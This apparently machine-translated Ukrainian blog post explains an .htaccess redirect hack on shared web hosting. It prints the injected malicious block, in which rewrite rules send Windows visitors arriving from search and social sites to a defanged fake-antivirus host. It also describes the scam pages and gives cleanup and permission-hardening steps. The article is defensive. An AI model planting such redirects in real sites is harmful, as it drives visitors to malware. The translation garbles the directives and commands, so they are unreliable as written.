Шкідливе / Вірус - .htaccess "переписати" і перенаправлення

Нова форма вірусу чого я не знаю багато впливає на сайти, розміщені на незахищені сервери де користувачі рахунків / субрахунків можуть "бачити" один одного. Зокрема, всі хостинг-акаунтів поміщаються в папку "віртуальних доменів"І право укладення папка користувача в "віртуальних доменів" дається загальне ... реселлер користувача в більшості ситуацій. Це типовий метод не використовується веб-серверів WHM / Cpanel.

Дія .htaccess вірус - .htaccess Hack

вірус зачіпає файли .htaccess Сайт жертви. Рядки додаються / директива до перенаправляти відвідувачів (Виходячи з Yahoo, MSN, Google, facebook, yaindex, Twitter, MySpace, і т.д. сайти та портали з високою інтенсивністю руху) до деяких сайтів, які пропонують "антивірус". Це підроблені антивірусиПро якому я писав у передмові до .

Так .htaccess постраждалих (не одержати доступ до URL-адрес рядків контенту нижче)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Яндекс. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Однокласників. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Рамблер. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Вікіпедія. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Linkedin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Сосо. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * PornHub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Живий журнал. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Прошу. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Пошук. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Пошта. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {} HTTP_USER_AGENT. * Windows *.
. RewriteRule * Hxxp: //wwww.peoriavascularsurgery.com/main.php H =% {} & I = HTTP_HOST J8iiidsar / qmiRj7V8NOyJoXpA == & е = г [R, L]

RewriteCond% {} REQUEST_FILENAME!-F
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond% {} * REQUEST_FILENAME Jpg $ |! .. * Gif $ |. Png $ *
RewriteCond% {} HTTP_USER_AGENT. * Windows *.
RewriteRule. * [R, L]

Користувачі WordPress буде знайти ці рядки у файлі .htaccess від public_html. Крім того, вірус створює. Ідентичні Htaccess в папку WP-зміст.

*Існують також ситуації, в яких замість відбувається peoriavascularsurgery.com dns.thesoulfoodcafe.com або інші адреси.

Що робить цей вірус.

Після перенаправлені, відвідувач зустрічає з розпростертими обіймами повідомлення:

Увага!
Комп'ютер містить різні ознаки вірусів і шкідливих програм присутності. Ваша система вимагає негайного анти віруси перевірити!
Система безпеки виконає швидке і безкоштовне сканування комп'ютера на наявність вірусів і шкідливих програм.

1 шкідливих

Незалежно від того, яка кнопка натиснута, ми прийняті до сторінки "Мій комп'ютер"Створений, щоб імітувати Дизайн XP. Це автоматично починає "Сканування" в кінці якої ми знаходимо, що «заразився».

2 шкідливих

Після натискання кнопки ОК або Відміна, він почне скачатиФайлів setup.exe. Це setup.exe є підробленою антивірусної впливаючи на систему. Це буде встановити ряд шкідливих програм, які поширюються віруси додаткові посилання, і до того ж вони в антивірусне програмне забезпечення (Усі помилкове), що жертва пропонується купити.
Ті, хто вже зв'язався з вірусом можуть використовувати цю форму . Крім того, рекомендується сканувати весь жорсткий диск. Рекомендувати Kaspersky Internet Security або Антивірус Вірус.

Цей тип вірусу вражає відвідувача операційної системи OS Windows XP, Windows Me, Windows 2000, Windows NT, Windows 98 і вікна 95. Так що далеко жодного випадку зараження операційних систем Windows Vista і Windows 7.

Як ми можемо видалити цей вірус. Htaccess файл на сервер, і як запобігти інфекції.

1. Аналізу підозрілих файлів і стирання кодів. Щоб переконатися, що файл не лише постраждалі .htaccess краще проаналізувати всі файли . Php si . Js.

2. Переписування файлу. Htaccess і я встановив CHMOD 644 або 744 з доступом на запис тільки Користувач власника.

3. При створенні облікового запису хостингу для веб-сайту в папку / Головна або / Webroot Це автоматично створить папку, яка часто має ім'я користувача (користувачеві CPanel, FTPІ т.д.). Для запобігання запису даних і передачі вірусів від одного користувача до іншого, рекомендується, щоб кожен користувач папки на вибір:

CHMOD або 644 744, 755 - показана 644.
Чаун-R nume_user nume_folder.
CHGRP-R nume_user nume_folder

LS-все способи перевірки, якщо вони були зроблені правильно. Має з'явитися щось на зразок цього:

drwx-Х-Х 12 Динаміка Динаміка травня 4096 6 14: 51 Динаміка /
drwx-х-х Duran Duran 10 березня 4096 7 07: 46 Duran /
drwx-Х-Х 12 4096 січня 29 11 труби трубки: 23 труб /
drwxr-XR-X 14 4096 лютого 26 2009 Express Експрес Express /
drwxr-XR-X 9 EZO EZO травня 4096 19 01: 09 EZO /
drwx-Х-Х Pharma Pharma 9 4096 грудня 19 22: 29 Pharma /

Якщо один з вищою буде userele FTP Заражені файлиВін не може відправити вірус іншому користувачеві хоста. Це мінімум захисту населення з метою захисту користувачів, розміщених на веб-сервері.

Загальні елементи районах, постраждалих від даного типу вірусу.

Всі райони, постраждалі перенаправляти відвідувачів на сайти по доменному імені, що містить "/".

Цей "вірус. Htaccess«Стосується будь-якого типу CMS (Joomla, WordPress, PHPBBІ т.д.), який використовує .htaccess,

. Htaccess Перенаправлення Вірус Hack &.

Шкідливе / Вірус - .htaccess "переписати" і перенаправлення

Про автора

Stealth LP

Засновник і головний редактор налаштування StealthУ день 2006.
Досвід в операційних системах Linux (зокрема, CentOS), Mac OS X, Windows XP> Вікна 10 і WordPress (CMS).

Залишити коментар

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.